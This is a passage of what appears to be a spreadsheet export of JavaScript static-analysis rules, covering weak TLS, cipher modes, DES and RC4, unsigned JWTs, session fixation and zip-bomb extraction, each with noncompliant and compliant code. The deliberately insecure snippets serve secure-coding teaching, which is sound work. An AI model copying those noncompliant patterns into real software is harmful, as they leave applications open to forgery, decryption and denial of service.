&lt;p&gt;&lt;a href="https://www.npmjs.com/package/request"&gt;request&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let socket = request.get(options);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;Set either &lt;code&gt;secureProtocol&lt;/code&gt; or &lt;code&gt;secureOptions&lt;/code&gt; or &lt;code&gt;minVersion&lt;/code&gt; to use secure protocols only (TLSv1.2 and
higher):&lt;/p&gt;
&lt;pre&gt;
let options = {
  secureProtocol: 'TLSv1_2_method'
};
// or
let options = {
  secureOptions: constants.SSL_OP_NO_SSLv2 | constants.SSL_OP_NO_SSLv3 | constants.SSL_OP_NO_TLSv1 | constants.SSL_OP_NO_TLSv1_1
};
// or
let options = {
    minVersion: 'TLSv1.2'
};
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/https.html"&gt;https&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let req = https.request(options, (res) =&amp;gt; {
  res.on('data', (d) =&amp;gt; {
    process.stdout.write(d);
  });
});  // Compliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/tls.html"&gt;tls&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let socket = tls.connect(443, "www.example.com", options, () =&amp;gt; { });
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/request"&gt;request&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let socket = request.get(options);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href="https://cwe.mitre.org/data/definitions/326.html"&gt;MITRE, CWE-327&lt;/a&gt; - Inadequate Encryption Strength &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/327.html"&gt;MITRE, CWE-326&lt;/a&gt; - Use of a Broken or Risky Cryptographic Algorithm &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices#22-use-secure-protocols"&gt;SSL and TLS Deployment Best
  Practices - Use secure protocols&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4787</t>
  </si>
  <si>
    <t>Encrypting data is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7902"&gt;CVE-2017-7902&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1378"&gt;CVE-2006-1378&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1376"&gt;CVE-2003-1376&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed
regularly. However these are not the only means to defeat or weaken an encryption.&lt;/p&gt;
&lt;p&gt;This rule flags function calls that initiate encryption/decryption.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the private key might not be random, strong enough or the same key is reused for a long long time. &lt;/li&gt;
  &lt;li&gt; the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner. &lt;/li&gt;
  &lt;li&gt; the key exchange is made without properly authenticating the receiver. &lt;/li&gt;
  &lt;li&gt; the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time
  passes. &lt;/li&gt;
  &lt;li&gt; the chosen encryption library is deemed unsafe. &lt;/li&gt;
  &lt;li&gt; a nonce is used, and the same value is reused multiple times, or the nonce is not random. &lt;/li&gt;
  &lt;li&gt; the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  &lt;/li&gt;
  &lt;li&gt; the CBC (Cypher Block Chaining) algorithm is used for encryption, and itâ€™s IV (Initialization Vector) is not generated using a secure random
  algorithm, or it is reused. &lt;/li&gt;
  &lt;li&gt; the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information.
  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You are at risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Generate encryption keys using secure random algorithms. &lt;/li&gt;
  &lt;li&gt; When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force
  attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  &lt;/li&gt;
  &lt;li&gt; Regenerate the keys regularly. &lt;/li&gt;
  &lt;li&gt; Always store the keys in a safe location and transfer them only over safe channels. &lt;/li&gt;
  &lt;li&gt; If there is an exchange of cryptographic keys, check first the identity of the receiver. &lt;/li&gt;
  &lt;li&gt; Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are
  implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most
  probably have flaws. &lt;/li&gt;
  &lt;li&gt; When a nonce is used, generate it randomly every time. &lt;/li&gt;
  &lt;li&gt; When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP). &lt;/li&gt;
  &lt;li&gt; When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks
  like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption
  cycle, because the IVâ€™s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts. &lt;/li&gt;
  &lt;li&gt; The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be
  preferred to the following combinations which are not secured:
    &lt;ul&gt;
      &lt;li&gt; Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it
      does not hide data patterns well. In some senses, it doesnâ€™t provide serious message confidentiality, and it is not recommended for use in
      cryptographic protocols at all. &lt;/li&gt;
      &lt;li&gt; Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks. &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
// === Client side ===
crypto.subtle.encrypt(algo, key, plainData); // Sensitive
crypto.subtle.decrypt(algo, key, encData); // Sensitive
&lt;/pre&gt;
&lt;pre&gt;
// === Server side ===
const crypto = require("crypto");
const cipher = crypto.createCipher(algo, key); // Sensitive
const cipheriv = crypto.createCipheriv(algo, key, iv); // Sensitive
const decipher = crypto.createDecipher(algo, key); // Sensitive
const decipheriv = crypto.createDecipheriv(algo, key, iv); // Sensitive
const pubEnc = crypto.publicEncrypt(key, buf); // Sensitive
const privDec = crypto.privateDecrypt({ key: key, passphrase: secret }, pubEnc); // Sensitive
const privEnc = crypto.privateEncrypt({ key: key, passphrase: secret }, buf); // Sensitive
const pubDec = crypto.publicDecrypt(key, privEnc); // Sensitive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href="http://cwe.mitre.org/data/definitions/321.html"&gt;MITRE, CWE-321&lt;/a&gt; - Use of Hard-coded Cryptographic Key &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/322.html"&gt;MITRE, CWE-322&lt;/a&gt; - Key Exchange without Entity Authentication &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/323.html"&gt;MITRE, CWE-323&lt;/a&gt; - Reusing a Nonce, Key Pair in Encryption &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/324.html"&gt;MITRE, CWE-324&lt;/a&gt; - Use of a Key Past its Expiration Date &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/325.html"&gt;MITRE, CWE-325&lt;/a&gt; - Missing Required Cryptographic Step &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/326.html"&gt;MITRE, CWE-326&lt;/a&gt; - Inadequate Encryption Strength &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/327.html"&gt;MITRE, CWE-327&lt;/a&gt; - Use of a Broken or Risky Cryptographic Algorithm &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated; use {rule:javascript:S4426}, {rule:javascript:S5542}, {rule:javascript:S5547} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S5876</t>
  </si>
  <si>
    <t>A new session should be created during user authentication</t>
  </si>
  <si>
    <t>&lt;p&gt;Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, itâ€™s a
good practice to generate a new session each time a user authenticates and delete/invalidate the existing session (the one possibly known by the
attacker).&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;For &lt;a href="http://www.passportjs.org/"&gt;Passport.js&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    // Sensitive - no session.regenerate after login
    res.redirect('/');
  });
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;For &lt;a href="http://www.passportjs.org/"&gt;Passport.js&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    let prevSession = req.session;
    req.session.regenerate((err) =&amp;gt; {  // Compliant
      Object.assign(req.session, prevSession);
      res.redirect('/');
    });
  });
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A2-Broken_Authentication"&gt;OWASP Top 10 2017 Category A2&lt;/a&gt; -
  Broken Authentication &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Session_fixation"&gt;OWASP Sesssion Fixation&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/384.html"&gt;MITRE, CWE-384&lt;/a&gt; - Session Fixation &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S6079</t>
  </si>
  <si>
    <t>Tests should not execute any code after "done()" is called</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;done&lt;/code&gt; callback is used to inform Mocha when an asynchronous test ends. Exceptions thrown after &lt;code&gt;done&lt;/code&gt; (with or without
parameters) is called are not handled in a consistent manner. Sometimes they will be correctly handled, but they might as well be assigned to a
different test, no test at all, or even be completely ignored. Even when it works as expected this will be a source of confusion for other developers.
Thus no code should be executed after &lt;code&gt;done&lt;/code&gt; is called.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when some code is executed after a call to &lt;code&gt;done&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const expect = require("chai").expect;
const fs = require("fs");
describe("Code is executed after Done", function() {
    it("Has asserts after done()", function(done) {
        try {
            expect(1).toEqual(2);
        } catch (err) {
            done();
            // This assertion will be ignored and the test will pass.
            expect(err).to.be.an.instanceof(RangeError);  // Noncompliant
        }
    });
    it("Throws an error some time after done()", function(done) {
        fs.readFile("/etc/bashrc", 'utf8', function(err, data) {
            done();
            setTimeout(() =&amp;gt; {  // Noncompliant
                // This assertion error will not be assigned to any test.
                // Developers will have to guess which test failed.
                expect(data).to.match(/some expected string/);
            }, 3000);
        });
    });
    it("Has code after done(err)", function(done) {
        try {
            throw Error("An error");
        } catch (err) {
            done(err);
        }
        fs.readFile("/etc/bashrc", 'utf8', function(err, data) {  // Noncompliant
            // This assertion error will be assigned to "Other test".
            expect(data).to.match(/some expected string/);
        });
    });
    it("Other test", function(done) {
        done()
    });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const expect = require("chai").expect;
const fs = require("fs");
describe("Code is executed after Done", function() {
    it("Has asserts after done()", function(done) {
        try {
            expect(1).toEqual(2);
        } catch (err) {
            expect(err).to.be.an.instanceof(RangeError);
            done();
        }
    });
    it("Throws an error some time after done()", function(done) {
        fs.readFile("/etc/bashrc", 'utf8', function(err, data) {
            setTimeout(() =&amp;gt; {
                expect(data).to.match(/some expected string/);
                done();
            }, 3000);
        });
    });
    it("Has code after done(err)", function(done) {
        try {
            throw Error("An error");
        } catch (err) {
            return done(err);
        }
        fs.readFile("/etc/bashrc", 'utf8', function(err, data) {
            // This assertion error will be assigned to "Other test".
            expect(data).to.match(/some expected string/);
            done();
        });
    });
    it("Other test", function(done) {
        done()
    });
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5542</t>
  </si>
  <si>
    <t>Encryption algorithms should be used with secure mode and padding scheme</t>
  </si>
  <si>
    <t>&lt;p&gt;Encryption operation mode and the padding scheme should be chosen appropriately to guarantee data confidentiality, integrity and authenticity:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; For block cipher encryption algorithms (like AES):
    &lt;ul&gt;
      &lt;li&gt; The GCM (Galois Counter Mode) mode which &lt;a href="https://en.wikipedia.org/wiki/Galois/Counter_Mode#Mathematical_basis"&gt;works
      internally&lt;/a&gt; with zero/no padding scheme, is recommended, as it is designed to provide both data authenticity (integrity) and confidentiality.
      Other similar modes are CCM, CWC, EAX, IAPM and OCB. &lt;/li&gt;
      &lt;li&gt; The CBC (Cipher Block Chaining) mode by itself provides only data confidentiality, itâ€™s recommended to use it along with Message
      Authentication Code or similar to achieve data authenticity (integrity) too and thus to &lt;a
      href="https://en.wikipedia.org/wiki/Padding_oracle_attack"&gt;prevent padding oracle attacks&lt;/a&gt;. &lt;/li&gt;
      &lt;li&gt; The ECB (Electronic Codebook) mode doesnâ€™t provide serious message confidentiality: under a given key any given plaintext block always gets
      encrypted to the same ciphertext block. This mode should not be used. &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
  &lt;li&gt; For RSA encryption algorithm, the recommended padding scheme is OAEP. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/crypto.html"&gt;crypto&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
crypto.createCipheriv("AES-128-CBC", key, iv); // Noncompliant: CBC with PKCS5/7 (set by default) is vulnerable to oracle padding attacks
crypto.createCipheriv("AES-128-ECB", key, ""); // Noncompliant: ECB doesn't provide serious message confidentiality
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/crypto.html"&gt;crypto&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
crypto.createCipheriv("AES-256-GCM", key, iv);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; - Security
  Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/327.html"&gt;MITRE, CWE-327&lt;/a&gt; - Use of a Broken or Risky Cryptographic Algorithm &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1067</t>
  </si>
  <si>
    <t>Expressions should not be too complex</t>
  </si>
  <si>
    <t>&lt;p&gt;The complexity of an expression is defined by the number of &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;, &lt;code&gt;||&lt;/code&gt; and &lt;code&gt;condition ? ifTrue : ifFalse&lt;/code&gt;
operators it contains.&lt;/p&gt;
&lt;p&gt;A single expressionâ€™s complexity should not become too high to keep the code readable.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S5547</t>
  </si>
  <si>
    <t>Cipher algorithms should be robust</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/Strong_cryptography"&gt;Strong cipher algorithms&lt;/a&gt; are cryptographic systems resistant to cryptanalysis, they
are not vulnerable to well-known attacks like brute force attacks for example.&lt;/p&gt;
&lt;p&gt;A general recommendation is to only use cipher algorithms intensively tested and promoted by the cryptographic community.&lt;/p&gt;
&lt;p&gt;More specifically for block cipher, itâ€™s not recommended to use algorithm with a block size inferior than 128 bits.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/crypto.html"&gt;crypto&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
crypto.createCipheriv("DES", key, iv); // Noncompliant: DES / 3DES is unsecure
crypto.createCipheriv("DES-EDE", key, ""); // Noncompliant: DES / 3DES is unsecure
crypto.createCipheriv("DES-EDE3", key, ""); // Noncompliant: DES / 3DES is unsecure
crypto.createCipheriv("RC2", key, iv); // Noncompliant: RC2 is vulnerable to a related-key attack
crypto.createCipheriv("RC4", key, "");// Noncompliant: RC4 is vulnerable to several attacks
crypto.createCipheriv("BF", key, iv);// Noncompliant: Blowfish use a 64-bit block size makes it vulnerable to birthday attacks
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/crypto.html"&gt;crypto&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
crypto.createCipheriv("AES-256-GCM", key, iv);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/327.html"&gt;MITRE, CWE-327&lt;/a&gt; - Use of a Broken or Risky Cryptographic Algorithm &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1854</t>
  </si>
  <si>
    <t>Unused assignments should be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value
only to then overwrite it or throw it away, could indicate a serious error in the code. Even if itâ€™s not an error, it is at best a waste of resources.
Therefore all calculated values should be used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
i = a + b; // Noncompliant; calculation result not used before value is overwritten
i = compute();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
i = a + b;
i += compute();
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This rule ignores initializations to -1, 0, 1, &lt;code&gt;null&lt;/code&gt;, &lt;code&gt;undefined&lt;/code&gt;, [], {}, &lt;code&gt;true&lt;/code&gt;, &lt;code&gt;false&lt;/code&gt; and
&lt;code&gt;""&lt;/code&gt;. Variables that start with an underscore (e.g. '&lt;code&gt;_unused&lt;/code&gt;') are ignored.&lt;/p&gt;
&lt;p&gt;This rule also ignores variables declared with object destructuring using rest syntax (used to exclude some properties from object):&lt;/p&gt;
&lt;pre&gt;
let {a, b, ...rest} = obj; // 'a' and 'b' are ok
doSomething(rest);
let [x1, x2, x3] = arr;    // but 'x1' is noncompliant, as omitting syntax can be used: "let [, x2, x3] = arr;"
doSomething(x2, x3);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/563.html"&gt;MITRE, CWE-563&lt;/a&gt; - Assignment to Variable without Use ('Unused Variable') &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5659</t>
  </si>
  <si>
    <t>JWT should be signed and verified with strong cipher algorithms</t>
  </si>
  <si>
    <t>&lt;p&gt;If a JSON Web Token (JWT) is not signed with a strong cipher algorithm (or not signed at all) an attacker can forge it and impersonate user
identities.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Donâ€™t use &lt;code&gt;none&lt;/code&gt; algorithm to sign or verify the validity of a token. &lt;/li&gt;
  &lt;li&gt; Donâ€™t use a token without verifying its signature before. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/jsonwebtoken"&gt;jsonwebtoken&lt;/a&gt; library:&lt;/p&gt;
&lt;pre&gt;
const jwt = require('jsonwebtoken');
let token = jwt.sign({ foo: 'bar' }, key, { algorithm: 'none' }); // Noncompliant: 'none' cipher doesn't sign the JWT (no signature will be included)
jwt.verify(token, key, { expiresIn: 360000 * 5, algorithms: ['RS256', 'none'] }, callbackcheck); // Noncompliant: 'none' cipher should not be used when verifying JWT signature
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/jsonwebtoken"&gt;jsonwebtoken&lt;/a&gt; library:&lt;/p&gt;
&lt;pre&gt;
const jwt = require('jsonwebtoken');
let token = jwt.sign({ foo: 'bar' }, key, { algorithm: 'HS256' }); // Compliant
jwt.verify(token, key, { expiresIn: 360000 * 5, algorithms: ['HS256'] }, callbackcheck); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/347.html"&gt;MITRE, CWE-347&lt;/a&gt; - Improper Verification of Cryptographic Signature &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S3353</t>
  </si>
  <si>
    <t>Unchanged variables should be marked "const"</t>
  </si>
  <si>
    <t>&lt;p&gt;Marking a variable that is unchanged after initialization &lt;code&gt;const&lt;/code&gt; is an indication to future maintainers that "no this isnâ€™t updated,
and itâ€™s not supposed to be". &lt;code&gt;const&lt;/code&gt; should be used in these situations in the interests of code clarity.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function seek(input) {
  let target = 32;  // Noncompliant
  for (let i of input) {  // Noncompliant
    if (i == target) {
      return true;
    }
  }
  return false;
}
function getUrl(query) { &amp;nbsp;&amp;nbsp;&amp;nbsp;
  let&amp;nbsp;url; // Noncompliant
  url = "http://example.com";
  return url;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function seek(input) {
  const target = 32;
  for (const i of input) {
    if (i == target) {
      return true;
    }
  }
  return false;
}
function getUrl(query) { &amp;nbsp;
  const&amp;nbsp;url = "http://example.com";
  return url;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5042</t>
  </si>
  <si>
    <t>Expanding archive files without controlling resource consumption is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can
lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of
uncompressed data. To achieve this extreme &lt;a href="https://en.wikipedia.org/wiki/Data_compression_ratio"&gt;compression ratio&lt;/a&gt;, attackers will
compress irrelevant data (eg: a long string of repeated bytes).&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;p&gt;Archives to expand are untrusted and:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; There is no validation of the number of entries in the archive. &lt;/li&gt;
  &lt;li&gt; There is no validation of the total size of the uncompressed data. &lt;/li&gt;
  &lt;li&gt; There is no validation of the ratio between the compressed and uncompressed archive entry. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is
  1 to 3. &lt;/li&gt;
  &lt;li&gt; Define and control the threshold for maximum total size of the uncompressed data. &lt;/li&gt;
  &lt;li&gt; Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in
  particular itâ€™s not recommended to recursively expand archives (an entry of an archive could be also an archive). &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;For &lt;a href="https://github.com/npm/node-tar"&gt;tar&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const tar = require('tar');
tar.x({ // Sensitive
  file: 'foo.tar.gz'
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/cthackers/adm-zip"&gt;adm-zip&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const AdmZip = require('adm-zip');
let zip = new AdmZip("./foo.zip");
zip.extractAllTo("."); // Sensitive
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://stuk.github.io/jszip/"&gt;jszip&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const fs = require("fs");
const JSZip = require("jszip");
fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) { // Sensitive
    zip.forEach(function (relativePath, zipEntry) {
      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(zipEntry.name);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          fs.writeFileSync(zipEntry.name, content);
        });
      }
    });
  });
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/thejoshwolfe/yauzl"&gt;yauzl&lt;/a&gt; module&lt;/p&gt;
&lt;pre&gt;
const yauzl = require('yauzl');
yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;
  zipfile.on("entry", function(entry) {
    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/maxogden/extract-zip"&gt;extract-zip&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const extract = require('extract-zip')
async function main() {
  let target = __dirname + '/test';
  await extract('test.zip', { dir: target }); // Sensitive
}
main();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;For &lt;a href="https://github.com/npm/node-tar"&gt;tar&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const tar = require('tar');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
let fileCount = 0;
let totalSize = 0;
tar.x({
  file: 'foo.tar.gz',
  filter: (path, entry) =&amp;gt; {
    fileCount++;
    if (fileCount &amp;gt; MAX_FILES) {
      throw 'Reached max. number of files';
    }
    totalSize += entry.size;
    if (totalSize &amp;gt; MAX_SIZE) {
      throw 'Reached max. size';
    }
    return true;
  }
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/cthackers/adm-zip"&gt;adm-zip&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const AdmZip = require('adm-zip');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;
let fileCount = 0;
let totalSize = 0;
let zip = new AdmZip("./foo.zip");
let zipEntries = zip.getEntries();
zipEntries.forEach(function(zipEntry) {
    fileCount++;
    if (fileCount &amp;gt; MAX_FILES) {
        throw 'Reached max. number of files';
    }
    let entrySize = zipEntry.getData().length;
    totalSize += entrySize;
    if (totalSize &amp;gt; MAX_SIZE) {
        throw 'Reached max. size';
    }
    let compressionRatio = entrySize / zipEntry.header.compressedSize;
    if (compressionRatio &amp;gt; THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
    }
    if (!zipEntry.isDirectory) {
        zip.extractEntryTo(zipEntry.entryName, ".");
    }
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://stuk.github.io/jszip/"&gt;jszip&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const fs = require("fs");
const pathmodule = require("path");
const JSZip = require("jszip");
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
let fileCount = 0;
let totalSize = 0;
let targetDirectory = __dirname + '/archive_tmp';
fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) {
    zip.forEach(function (relativePath, zipEntry) {
